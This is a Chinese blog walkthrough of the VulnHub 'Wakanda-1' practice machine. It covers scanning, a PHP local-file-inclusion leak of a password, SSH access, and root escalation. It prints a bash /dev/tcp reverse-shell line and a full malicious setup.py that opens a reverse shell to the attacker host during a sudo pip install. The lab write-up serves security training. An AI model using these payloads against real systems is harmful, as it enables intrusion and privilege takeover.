vulnhub系列:wakanda-1

已于 2024-08-08 21:26:39 修改
阅读量411 收藏 4
点赞数 5
分类专栏: vulnhub系列 文章标签: web安全 网络安全
于 2024-08-08 20:24:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/141035639
版权

vulnhub系列:wakanda-1

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.56.0/24

image-20240808183714413

nmap扫描端口,开放端口:80、111、3333、52890

nmap 192.168.56.101 -p- -A -sV -Pn

image-20240808183857151

dirb扫描目录,存在admin、backup等目录

dirb http://192.168.56.101/

image-20240808184024852

访问80端口,没什么发现

image-20240808184119306

f12查看源码,发现一个参数

image-20240808184334049

贴到url中,发现变成了法语

image-20240808184852358

可能存在文件包含,尝试读取网站源码

?lang=php://filter/convert.base64-encode/resource=index

得到网站源码

PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=

image-20240808185607885

解码后得到密码

Niamey4Ever227!!!

image-20240808185713485

80端口没发现什么功能点,尝试ssh登录,网站首页发现一个可能作为用户的字符串

image-20240808185835834

二、getshell

尝试ssh连接

ssh mamadou@192.168.56.101 -p 3333
Niamey4Ever227!!!

成功连接,但是shell是python的

image-20240808190039958

切换到shell

import os
os.system("/bin/bash")

image-20240808190154008

flag 1

查看当前目录,发现flag文件

image-20240808190312452

三、提权

查看当前权限,查看内核版本,没有找到合适的提权方式

sudo -l
uname -r

image-20240808190525425

在passwd中发现另一个用户 devops

cat /etc/passwd
devops

image-20240808190619698

进入 devops目录,发现flag文件,但是没有权限

image-20240808190746095

搜索其所属文件

find / -user devops 2>/dev/null

image-20240808191113543

发现 /srv/.antivirus.py 文件会将内容写入到 /tmp/test 中

open('/tmp/test','w').write('test')

image-20240808191328184

将内容修改一下,尝试执行反弹shell

import os
os.system("echo 'bash -i >& /dev/tcp/192.168.56.102/4444 0>&1'|bash")

image-20240808191930911

kali开启监听

nc -lvnp 4444

image-20240808192022432

执行发现没有权限,但是等了一会自己弹到了,应该是有计划任务在定时执行

image-20240808193442513

flag 2

成功反弹shell,查看第二个flag文件

image-20240808193550998

查看当前权限

sudo -l

image-20240808193625743

pip可以执行

网上搜了下exp,在创建一个setup.py,在其中写入

from setuptools import setup
from setuptools.command.install import install
import base64
import os
 
 
class CustomInstall(install):
  def run(self):
    install.run(self)
    RHOST = '192.168.56.102' 
 
    reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 7777; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST
    encoded = base64.b64encode(reverse_shell)
    os.system('echo %s|base64 -d|bash' % encoded)
 
 
setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='andre.marques@esecurity.com.br',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

开启临时web服务,将其下载到 /tmp 目录中

image-20240808195319271

kali开启监听

nc -lvnp 7777

image-20240808200106326

靶机执行命令,成功反弹shell,提权成功

sudo /usr/bin/pip install . --upgrade --force-reinstall

image-20240808200142224

flag 3

在 /root/root.txt 发现最后的flag

image-20240808200243354

三天三夜睡不着
关注
专栏目录
VulnHub实战篇二:Wakanda-1靶机渗透记录
a1004070060的博客
04-05 1073
0x01靶机信息 靶机名称:Wakanda-1 下载地址:https://download.vulnhub.com/wakanda/wakanda-1.ova 操作系统:debian 渗透目标:获取root权限,取得三个flag 0x02信息搜集 1.主机信息扫描 本地虚拟机搭建完环境后无法获悉靶机地址,需要使用主机探测工具扫描一下ip,这里使用nmap,命令如下。 nma...
Vulnhub入门实战-Wakanda
qq_24033605的博客
07-14 2269
下载链接 描述: 1.探测主机的IP地址 2.使用nmap查看靶机开放端口。 开放了4个端口,老样子先从http下手。 3.进去发现没什么可以点的,于是进行目录扫描。 状态码都是200,但是size为0,所以返回的都是空页面。 查看主页源代码,发现一个注释。 猜测存在本地文件包含漏洞,抓包看一下。 成功读取主页源码,并发现密码,猜测下一步根据账号和密码进行ssh登录。 账户猜测就是主页的namemamadou,passwdNiamey4Ever227!!! 这里的使用凭证是有效的,但是还
vulnhubWakanda :1靶机
wbplife的博客
08-07 654
lang=fr表示语言为法语,可以设置成中文,英语等语言,既然这个lang可以改变语言,那么说明改变语言使用了语言php文件,那么关联的就是文件包含漏洞了,页面没什么可以下手的地方,那我们就构造url,这里就关联到一个知识点,也是我们要用到的:php://filter.它是php中一个独有的协议,它作为一个中间流来处理其流,比如我们可以将我们手上的源码用base64解码来dowm下来.创建一个恶意setup.py并上传到tmp目录,和上面的方法一样,创建文件,并远程下载到/tmp目录下面。
【甄选靶场】Vulnhub百个项目渗透——项目二十二:Wakanda_1(LFI本地文件包含,pip提权)
人间体佐菲的博客
09-24 856
Vulnhub百个项目渗透——项目二十二:Wakanda_1(LFI本地文件包含,pip提权)信息安全网络安全,渗透测试
wakanda-1
weixin_52953960的博客
08-08 246
发现 /srv/.antivirus.py 文件会将内容写入到 /tmp/test 中。80端口没发现什么功能点,尝试ssh登录,网站首页发现一个可能作为用户的字符串。进入 devops目录,发现flag2文件,但是没有权限。网上搜了下exp,创建一个setup.py,在其中写入。查看当前权限,查看内核版本,没有找到合适的提权方式。开启临时web服务,将其下载到 /tmp 目录中。kali开启监听,等一会儿,成功反弹shell。靶机执行命令,成功反弹shell,提权成功。贴到url中,发现变成了法语。
wakanda-1靶机
hqy250019的博客
08-08 426
还发现一个test文件,仔细观察后发现,test文件每隔五分钟就会被修改一次,说明有一个定时任务在不断调用.antivirus.py。在/srv发现一个隐藏文件.antivirus.py,该文件任意用户都有写权限,但没有执行权限。ssh连接 mamadou : Niamey4Ever227!拼接参数存在php伪协议的文件包含,包含首页文件inde.php。将.antivirus.py文件修改为反弹shell的代码。这是一个python环境,家目录下有个flag文件。主机发现,注意找mac地址对应的ip。
VulnHub_WaKanda_1
qq_45434762的博客
07-26 207
发现目标主机使用nmap扫描网段,找到目标主机nmap 192.168.1.0/24 扫描目标主机开放端口使用nmap探测目标主机开放的端口sudo nmap -A 192.168.1....
靶机wakanda_1练习报告
黑战士的博客
05-21 550
1.熟练使用多种提权方法。
wakanda-node:Wakanda数据库的简单节点连接器
04-29
npm i -S midrissi/wakanda-node 初始化连接器 初始化程序返回一个Promise(有关更多信息,请参阅 ) var wakanda = require ( 'wakanda-node' ) ; var promise = wakanda . init ( { remote : { host : '...
wakanda-twilio:Wakanda的Twilio客户端可以访问电话和短信服务
05-23
Wakanda-Twilio CommonJS模块 该模块为Wakanda提供了一个同步的SSJS API,以使用Twilio服务。 入门 var twilio , infos ; twilio = require ( 'wakanda-twilio/index' ) ; twilio . configure ( AccountSid...
wakanda-widgets:自定义小部件集成到 Wakanda 框架和 Wakanda GUI 设计器中
06-01
Wakanda-widgets 在此存储库中,您可以与社区共享您的自定义 Wakanda 小部件。 如何为创建自定义小部件 有关创建自定义小部件的信息,请参阅文档。 如何请求将您的小部件添加到此列表中 要将小部件的存储库添加到...
todo-node:一个使用wakanda-node连接器的简单待办应用
04-28
因此,您可以在本地运行wakanda解决方案(在运行nf命令之前.env忘记编辑.env文件),也可以随时使用。 执照 MIT许可证(MIT) 版权所有(c)2015 IDRISSI Mohamed 特此免费授予获得此软件和相关文档文件(“软件...
generator-wakanda-project:约曼瓦坎达项目生成器
07-08
这个非官方的Yeoman 生成器创建了 Wakanda 项目和解决方案,然后您可以从任何开发工具进行编辑,并提供 Grunt 服务任务以在 Wakanda 服务器上启动它们。 如何安装 安装 npm 并非每台新计算机都预装了 Yeoman。 他...
网络安全】漏洞挖掘之CVE-2019-9670+检测工具
最新发布
等风来
09-09 251
CVE-2019-9670 是一个与相关的严重漏洞。ZCS 中的 AutoDiscover 服务存在不正确的 XML 解析处理,该漏洞可被利用来注入恶意 XML 代码(例如外部实体注入(XXE)攻击),从而导致服务器任意文件读取或远程代码执行 (RCE)。Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行。
网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 404
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1491
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 995
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值